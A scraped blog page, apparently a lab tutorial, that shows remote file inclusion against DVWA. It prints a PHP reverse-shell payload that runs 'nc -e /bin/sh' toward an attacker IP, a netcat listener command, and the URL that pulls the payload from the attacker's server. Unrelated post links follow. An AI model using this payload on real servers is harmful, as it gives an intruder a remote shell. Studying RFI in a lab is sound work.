REMOTE FILE INCLUSION

  • Similar to local file inclusion.
  • But allows an attacker to read ANY file from ANY server.
  • Execute PHP files from other servers on the current server.
  • Store PHP files on other servers as .txt.

Pre-Condition:

Set allow_url_include to On status.

Restart web service

Create a local php file on /var/www/html.

<?php

passthru("nc -e /bin/sh 10.0.0.13 8080");

?>

Execute the NC command to wait for connection.

nc -vv -l -p

Visit the URL(http://10.0.0.24/dvwa/vulnerabilities/fi/?page=http://10.0.0.13/reverse.txt?) to execute the reverse connection commands.

We connect to the target machine successfully.

Ethical Hacking - Web Penetration Testing(6)的更多相关文章

  1. Ethical Hacking - Web Penetration Testing(13)

    OWASP ZAP(ZED ATTACK PROXY) Automatically find vulnerabilities in web applications. Free and easy to ...

  2. Ethical Hacking - Web Penetration Testing(8)

    SQL INJECTION WHAT IS SQL? Most websites use a database to store data. Most data stored in it(userna ...

  3. Ethical Hacking - Web Penetration Testing(10)

    SQL INJECTION SQLMAP Tool designed to exploit SQL injections. Works with many DB types, MySQL, MSSQL ...

  4. Ethical Hacking - Web Penetration Testing(1)

    How to hack a website? An application installed on a computer. ->web application pen-testing A co ...

  5. Python Ethical Hacking - WEB PENETRATION TESTING(1)

    WHAT IS A WEBSITE Computer with OS and some servers. Apache, MySQL ...etc. Cotains web application. ...

  6. Python Ethical Hacking - WEB PENETRATION TESTING(2)

     CRAWING DIRECTORIES Directories/folders inside the web root. Can contain files or other directories ...

  7. Ethical Hacking - Web Penetration Testing(12)

    XSS VULNS XSS - CROSS SITE SCRIPTING VULNS Allow an attacker to inject javascript code into the page ...

  8. Ethical Hacking - Web Penetration Testing(11)

    SQL INJECTION Preventing SQLi Filters can be bypassed. Use a blacklist of commands? Still can be byp ...

  9. Ethical Hacking - Web Penetration Testing(9)

    SQL INJECTION Discovering SQLi in GET Inject by browser URL. Selecting Data From Database Change the ...

随机推荐

  1. cb32a_c++_STL_算法_查找算法_(5)adjacent_find

    cb32a_c++_STL_算法_查找算法_(5)adjacent_findadjacent_find(b,e),b,begin(),e,end()adjacent_find(b,e,p),p-par ...

  2. Golang实现数的几种遍历

    目录 PreOrder recursive Iterative InOrder Iterative PostOrder Iterative PreOrder recursive package mai ...

  3. 第一章、认识Shiro

    Shiro简介 Apache Shiro是Java的一个安全框架.目前,使用Apache Shiro的人越来越多,因为它相当简单,对比Spring Security,可能没有Spring Securi ...

  4. 【Java思考】Java 中的实参与形参之间的传递到底是值传递还是引用传递呢?

    科普: 值传递(pass by value)是指在调用函数时将实际参数复制一份传递到函数中,这样在函数中如果对参数进行修改,将不会影响到实际参数. 引用传递(pass by reference)是指在 ...

  5. idea的maven项目无法引入junit类

    本机:java版本:1.8 pom中是junit版本:4.12 出现问题:在使用@Test 无法引入 : org.junit.Test; 解决方法:junit在pom.xml改为 4.12-beta- ...

  6. 平时Chrome中用的一些插件

    一.chrome://extensions Adblock Plus Dark Reader 让网站黑色主题 Infinity 新标签页 一个比较流行的新标签页工具 GNOME Shell integ ...

  7. vue全家桶(2.7)

    3.11.1.vue-router中的全局钩子函数 在vue-router中,路由发生变化,我们可以做一些事情,例如:可以决定是否进入导航,可以决定跳转到哪里,官方文档中又叫做导航守卫 首先来看一个全 ...

  8. cp5200的一般步骤

    cp5200的一般步骤: 1.创建数据对象 hObj = CP5200_CommData_Create(nCommType, id, GetIDCode()); 2.生成所需要的数据,如 :生成设置亮 ...

  9. 病毒Virus

    病毒Virus 一本通P1396 病毒Virus 题目简述 给定\(k\)个被病毒感染了的字符串,知道这\(k\)个字符串原本是按字典序从小到大排列,最后给出一个待复原的字符串\(s\),要求根据上面 ...

  10. 洛谷 P3063 【[USACO12DEC]Milk Routing S】

    这道题可以暴力哒~ 我们枚举每一个出现过的容量,然后跑一次最短路,求延迟,在跑最短路的时候,如果遇到的某一个点,比我们当前枚举的那个点小,那么就直接不走这一个点,然后枚举完后,就能得到最大值了. 代码 ...